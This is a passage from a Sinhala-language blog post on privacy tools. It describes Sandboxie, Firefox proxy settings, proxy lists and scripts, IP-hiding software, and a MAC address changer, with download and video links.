3. ඊලඟ එක තමා " Sandboxie " . ඔයාලට මේක http://www.sandboxie.com/ භාගත කරගන්න පුලුවන් . sandboxie එකෙන් මුලිකවම කරන්නේ තමගේ පරිගනකය තුළ virtual memory එකක් සාදා , අප Sandboxie හරහා සිදුකරනු ලබන සියලුම ක්‍රියාකාරකම් මෙම virtual memory එක තුළ සිදුවන අතර, මෙමඟින් අප Sandboxie තුල ධාවනය කරනු ලබන මෘදුකාංග , භාගත කරනු ලබන ගොනු ඈතුළු කරනු ලබන් සියලුම ක්‍රියාකාරකම් අපට නිරික්ෂණය කර එහි හැසිරිමේ රටාවන් (Diagnostic results) හඳුනාගැනිමට වැනි කටයුතු සිදු කල හැකිය . මෙහි අනෙක් වාසිය නම් අප virtual memory එක කරනු ලබන සියලුම ක්‍රියාකාරකම් කරන නිසා පරිගනකයට කිසිදු හානියක් නොවිමත් , අප Sandboxie තුල සිදුකල සියලුම ක්‍රියාකාරකම් අපට අව්ශය නම් එවෙලෙහිම delete කිරිමට ඇති හැකියාවත්ය . garupale


ඔන්න මම sandboxie ගැන තියන හොඳ වීඩියෝ කටු 3 කුත් මෙතැන දාන්නම්කෝ , හැබැයි මේ 3 ත මම මෙතැන embed කරන්නේ නෑ , මොකද සයිට් එකේ page එක ලෝඩ් වෙන්න අලි වෙලාවක් යයි මේ 3 න දැම්මොත් මෙතැන දැම්මොත් . garupale

Video Part 1 : http://www.youtube.com/watch?v=GueXMq-Vyi8
Video Part 2 : http://www.youtube.com/watch?v=2IbwhE-r8_k
Video Part 3 : http://www.youtube.com/watch?v=4XBbC81bZx4

4 . අන්තිමට කියන්න තියන්නේ ඉතින් proxy භාවිතය සහ තමන්ගේ පරිගනකයේ mac address එක වෙනස් කරන හැටි තමා ඉතින් . Proxy ගැන කතාකරන්න මම browser එක විදිහට Firefox ගන්නම්කෝ . අනේ අපොයි මම කියන්න යන්නේ නෑ proxy එකක් කියන්නේ මොකක්ද , අරකද මේකද කියලා . සරලව කියන්නම් කොහොම්ද proxy එක හදාගෙන භාවිතාකරන්නේ කියලා . Firefox වලනම් ඔයාට tools -> options -> Advanced -> Network වල Settings කියන button එක click කරලා proxy settings ගන්න පුලුවන්.

ඕකේදි ඔයාලට Manual proxy Configuration Option එක පාවිච්චි කරලා proxy server එකක Ip address එක හා අදාල port එක අරගෙන proxy service එක භාවිතා කරන්න පුලුවන්. proxy servers වල Ip addresses සහ අදාල ports list කරලා පවත්වාගෙන යන වෙබ් අඩවි ඕනේ තරම් තියනවා , ඒවායින්

http://www.hidemyass.com/proxy-list/
http://nntime.com/proxy-ip-01.htm

හොඳ කොලෙක්ශන් එකක් තියන වෙබ් අඩවි ලෙස ගත හැක . තව වෙබ් අඩවි තියනවා proxy service එක සපයන වෙබ් අඩවි වල කොලෙක්සන් තියාගෙන ඉන්න වෙබ් අඩවි . ගුගල් දෙයියන්ගෙන් ඇහුවොත් දෙයි නාන්නම . එවැනි ගුණාත්මක වෙබ් අඩවි පිලිබද හොඳ කොලෙක්ශන් එකක් තියන වෙබ් අඩවියක් ලෙස http://www.proxy4free.com/list/webproxy1.html ගන්න පුලුවන් . ආ අනික තමා ඔයාලට ඔය proxy configuration ස්වයංක්‍රියවම සදාගෙන service එක ලබාදෙන වෙබ් අඩවිත් තියනවා . එම වෙබ් අඩවි වල අදාල service එක ලබාදෙන URL එක Automatic Proxy Configuration URL එකට දී අදාල වැඩේ කරගත හැක. උදාහරනයක් ලෙස http://tools.rosinstrument.com/cgi-bin/proxy.pac URL එක දිලා බලන්නකෝ !!
තව ඔයාලට වැඩි වැඩ කෑලි ඕනේම නම් (ඔය විනාඩි කියෙන් කීයට හරි proxy එක මාරු වෙන්න ඕනේ වගේ වැඩ කරගන්න ඕනේම නම්) Froxy proxy ( http://foxyproxy.mozdev.org/downloads.html ) වගේ addon එකක් වුනත් වගේ දාගෙන ගේම දෙන්න පුලුවන්. soal

ඔයාලට ඕනේම නම් proxy script එකක් භාගත කරගෙන එය වෙනම free hosting සපයන වෙබ් අඩවියකට දාගෙන proxy service එකක් run කරන්නත් පුලුවන් . ඔය පහත විඩියෝ කට්ටත් බලන්නකෝ එතකොට තේරේවී . proxy script ලෙස glype proxy (http://www.glype.com/) . PHP proxy (http://www.glype.com/) , phpMyProxy (http://www.phpmyproxy.com/) , CGI proxy (http://www.jmarshall.com/tools/cgiproxy/) , zelune Proxy (http://www.brothersoft.com/zelune-proxy-script-59008.html) ගතහැක . Free web hosting services "http://www.free-webhosts.com/webhosting-01.php" සොයාගත හැක.



මෙම් විඩියෝ සදහා භාවිතා කල වෙබ් අඩවි :
http://sourceforge.net/projects/poxy
http://www.000webhost.com/
http://www.python.org/download/releases/2.6.4/#download
http://code.google.com/appengine/downloads.html#Google_App_Engine_SDK_for_Python
http://www.tinkernut.com/downloads/tinkernut_proxy.zip
https://appengine.google.com/ වේ .

ආ තව පොඩ්ඩෙන් කියන්න අම්තක වෙනවා , ඔයාලට ඔය proxy service එක ලබාදෙන මෘදුකාංගත් තියන්වානේ , "Hide my IP " වගේ . ඒක ඔයාලට http://www.hide-my-ip.com/download.shtml භාගත කරගන්න පුලුවන් .



අනේ මට මේක ලියන්න ගිය කම්මැලිකම garupale !!! ඕං ඉත්න් අපට අවසාන වශයෙන් පරිගනකයේ mac address එක වෙනස් කිරිම්ට ජංජාලයේ ඕනේ තරම් tools තියනවා . එකක් කියනවා නම් http://www.technitium.com/tmac/index.html ගිහිල්ලා බාගෙනම දාලා බලන්නකෝ !! garupale





*මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!! garupale
ඉතිරිය කියවන්න .....>>
Related Posts with Thumbnails